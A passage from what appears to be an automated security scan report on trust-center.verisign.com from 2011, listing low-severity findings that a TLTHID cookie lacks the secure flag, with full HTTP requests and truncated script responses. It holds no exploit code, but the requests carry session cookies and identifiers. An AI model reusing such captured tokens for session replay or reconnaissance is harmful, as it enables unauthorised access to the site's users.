The following cookie was issued by the application and does not have the secure flag set:
TLTHID=65897DECDB2A10DB4CEE9F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/oo_engine_c.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:35 GMT Server: Apache Set-Cookie: TLTHID=65897DECDB2A10DB4CEE9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 28368 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript /* OnlineOpinion v4.1.7 */ /* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */ var OnlineOpinion=new Ob...[SNIP]...
6.49. https://trust-center.verisign.com/rcm/verisign/scripts/popup.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/popup.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=667DD996DB2A10DB6A7CCEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/popup.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:37 GMT Server: Apache Set-Cookie: TLTHID=667DD996DB2A10DB6A7CCEC4D1E75D2A; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 598 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript var currentPopupId=null;function hidePopup(){if(currentPopupId){hideElement(currentPopupId);currentPopupId=null;showElementBlock("right_content");showElementBlock("right_content_1");showElementBlock(...[SNIP]...
6.50. https://trust-center.verisign.com/rcm/verisign/scripts/product_white_list.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/product_white_list.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=657CE672DB2A10DB4CED9F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/product_white_list.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:35 GMT Server: Apache Set-Cookie: TLTHID=657CE672DB2A10DB4CED9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 1005 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript var product_white_list=["SS001","SS002","SS0Y3","SS003","GS001","GS002","GS0Y3","HA001","HA002","HA0Y3","GHA001","GHA002","GHA0Y3","ABSST000"];function white_list_product(product){for(var i=0;i<produ...[SNIP]...
6.51. https://trust-center.verisign.com/rcm/verisign/scripts/quick_signin.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/quick_signin.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=64A2C5DCDB2A10DB6A76CEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/quick_signin.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:34 GMT Server: Apache Set-Cookie: TLTHID=64A2C5DCDB2A10DB6A76CEC4D1E75D2A; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 5155 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript var http_request=false;var targetAjaxDiv="unspecified";function callbackFunction(){if(http_request.readyState==4){if(http_request.status==200){var result=http_request.responseText;try{document.getEle...[SNIP]...
6.52. https://trust-center.verisign.com/rcm/verisign/scripts/script_log.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/script_log.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=64914668DB2A10DB44AAB1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/script_log.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:34 GMT Server: Apache Set-Cookie: TLTHID=64914668DB2A10DB44AAB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 1408 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript var log;function getLogLevel(){if(document.getElementById("script_log")===null){return"none";}else{return document.getElementById("script_log").value;}} function generateCall(level,message){var url='...[SNIP]...
6.53. https://trust-center.verisign.com/rcm/verisign/scripts/src/dojo/dojo/dojo.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/src/dojo/dojo/dojo.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=657C9186DB2A10DB6A79CEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/src/dojo/dojo/dojo.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:35 GMT Server: Apache Set-Cookie: TLTHID=657C9186DB2A10DB6A79CEC4D1E75D2A; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:25 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 89269 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript /* Copyright (c) 2004-2009, The Dojo Foundation All Rights Reserved. Available via Academic Free License >= 2.1 OR the modified BSD license. see: http://dojotoolkit.org/license for details */ /* ...[SNIP]...
6.54. https://trust-center.verisign.com/rcm/verisign/scripts/syscheck.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/syscheck.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=63C826F2DB2A10DB6A72CEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/syscheck.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:33 GMT Server: Apache Set-Cookie: TLTHID=63C826F2DB2A10DB6A72CEC4D1E75D2A; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 1470 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript var oVal;var sessionTimerId=0;var SESSIONTIMEOUT=33*60*1000;function checkStatus(val){if(oVal!=val){window.location.reload();}} function callServer(check,orig){var localHttpObj=getXMLHttpObj();oVal=o...[SNIP]...
6.55. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDK.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/tealeaf/TealeafSDK.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=648BEF60DB2A10DB6A75CEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/tealeaf/TealeafSDK.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:34 GMT Server: Apache Set-Cookie: TLTHID=648BEF60DB2A10DB6A75CEC4D1E75D2A; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:09 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 57905 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript if(TeaLeaf&&TeaLeaf.Configuration&&TeaLeaf.Configuration.tlinit==false){TeaLeaf.Configuration.tlinit=true;if(!Array.prototype.push){Array.prototype.stackEnd=0;Array.prototype.push=function(a){this[thi...[SNIP]...
6.56. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=63C9FBBCDB2A10DB4CE79F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:33 GMT Server: Apache Set-Cookie: TLTHID=63C9FBBCDB2A10DB4CE79F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:09 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 22968 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript /* * Copyright . 1999-2009 TeaLeaf Technology, Inc. * All rights reserved. * * THIS SOFTWARE IS PROVIDED BY TEALEAF ``AS IS'' ...[SNIP]...
6.57. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_capture_payment.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/trustcenter_capture_payment.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=6589B492DB2A10DB4CEF9F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/trustcenter_capture_payment.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:35 GMT Server: Apache Set-Cookie: TLTHID=6589B492DB2A10DB4CEF9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:09 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 4605 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript function onPaymentMethodChange(){var paymentMethodObj=getElement("enrollment.payment.paymentMethod");if(paymentMethodObj!==null){var radioLength=paymentMethodObj.length;var index=0;for(var i=0;i<radi...[SNIP]...
6.58. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_product_selector.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/trustcenter_product_selector.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=657C8646DB2A10DB44AEB1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/trustcenter_product_selector.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:35 GMT Server: Apache Set-Cookie: TLTHID=657C8646DB2A10DB44AEB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:09 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 19769 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript var premiumSupportFee=0;var pciComplianceFee=0;var pricingMatrix=[];var validityObjFive=null;var validityObjFour=null;var validityObjThree=null;var validityObjTwo=null;var validityObjOne=null;var pro...[SNIP]...
6.59. https://trust-center.verisign.com/rcm/verisign/scripts/utility.js
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/utility.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=648BC83CDB2A10DB4CE99F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/utility.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
